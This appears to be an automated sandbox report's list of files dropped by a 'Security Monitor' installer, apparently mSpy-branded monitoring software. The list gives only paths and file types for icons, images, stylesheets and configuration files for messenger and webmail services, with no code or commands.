||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-RVCPB.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-T7NEH.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-TEGFK.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-TLVGL.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-UIPIG.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-UJ94G.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\mail.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\none.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\qip.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\skype.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\slack.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\trillian.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\IM.ini (copy)
|
Generic INItialization configuration [Zoom]
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\default.ini (copy)
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\is-G49N2.tmp
|
Generic INItialization configuration [Zoom]
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\is-KG47K.tmp
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\ru\default.ini (copy)
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\ru\is-59I55.tmp
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\zh\default.ini (copy)
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\zh\is-09EOP.tmp
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\1.html (copy)
|
HTML document, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\business-analyt-sprite.png (copy)
|
PNG image data, 1122 x 60, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\green_action_btns.png (copy)
|
PNG image data, 210 x 336, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\is-8157J.tmp
|
PNG image data, 210 x 336, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\is-HGEK6.tmp
|
PNG image data, 1122 x 60, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\ic_block.png (copy)
|
PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\ic_cal.png (copy)
|
PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\ic_chat.png (copy)
|
PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\ic_device1.png (copy)
|
PNG image data, 346 x 54, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\ic_gps.png (copy)
|
PNG image data, 66 x 67, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\ic_rest.png (copy)
|
PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\ic_web.png (copy)
|
PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\is-6B2RU.tmp
|
PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\is-AMF1H.tmp
|
PNG image data, 346 x 54, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\is-AOH0P.tmp
|
PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\is-IH94L.tmp
|
PNG image data, 66 x 67, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\is-M7U1S.tmp
|
PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\is-PO7GF.tmp
|
PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\is-Q3IOQ.tmp
|
PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\is-TSK4O.tmp
|
PNG image data, 122 x 295, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\logos.png (copy)
|
PNG image data, 122 x 295, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\is-2EHV5.tmp
|
HTML document, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\anythingslider.css (copy)
|
ASCII text
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\blue-arr-buy.png (copy)
|
PNG image data, 52 x 44, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\core-ui-select.css (copy)
|
ASCII text
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\ic_device1.png (copy)
|
PNG image data, 346 x 54, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-1L74C.tmp
|
ASCII text
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-A5GBN.tmp
|
ASCII text
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-BBRA8.tmp
|
PNG image data, 520 x 260, 8-bit/color RGB, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-CO9TR.tmp
|
PNG image data, 122 x 295, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-EKFRP.tmp
|
ASCII text
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-MRVL5.tmp
|
ASCII text
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-NQJ6V.tmp
|
PNG image data, 346 x 54, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-Q86D5.tmp
|
ASCII text
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-QVG6N.tmp
|
PNG image data, 52 x 44, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-T8J1V.tmp
|
PNG image data, 80 x 80, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-V5L72.tmp
|
ASCII text
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\logos.png (copy)
|
PNG image data, 122 x 295, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\main.css (copy)
|
ASCII text
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\mspy_products_home_slide1.png (copy)
|
PNG image data, 520 x 260, 8-bit/color RGB, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\photo1.png (copy)
|
PNG image data, 80 x 80, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\print.css (copy)
|
ASCII text
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\reset.css (copy)
|
ASCII text
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\widgets.css (copy)
|
ASCII text
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\GMX.com.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\GMX.com.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Gmail.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Gmail.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Mail.RU.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Mail.RU.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Mail.com.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Mail.com.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Outlook Mail.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Outlook Mail.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Outlook.Live.com.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Outlook.Live.com.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Yahoo Mail.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Yahoo Mail.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Yandex Mail.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Yandex Mail.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\facebook.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\facebook.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\google+.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\google+.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\imp.free.fr.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\imp.free.fr.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\instagram.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\instagram.png (copy)
|
PNG image data, 16 x 16, 8-bit colormap, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-1UD2J.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-2MFG4.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-3KI34.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-4DR51.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-512JL.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-5S1O8.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-62MML.tmp
|
PNG image data, 16 x 16, 8-bit colormap, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-68EAB.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-710RD.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-7L8PL.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-8UFSF.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-9JCT8.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-9OAEM.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-C0HFB.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-D8F43.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-D8T1G.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-DAIEE.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-DTO26.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-EQSBJ.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-FK77F.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-FNF9T.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-GJR85.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-GQJIT.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-J315H.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-J99KT.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-JN7FF.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-K8U0P.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-M5EKJ.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-MV760.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-N35L8.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-NA9LP.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-NBT4F.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-NHAEG.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-OETJM.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-OMTN8.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-QFPIR.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-QIB2R.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-QPF5D.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-QQ1FV.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-RTOBR.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-SO2F0.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-U64VL.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-V0TLT.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-V67H2.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\linkedin.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\linkedin.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\mail.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\mail.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\messagerie.orange.fr.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\messagerie.orange.fr.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\my.screenname.aol.com.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\my.screenname.aol.com.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
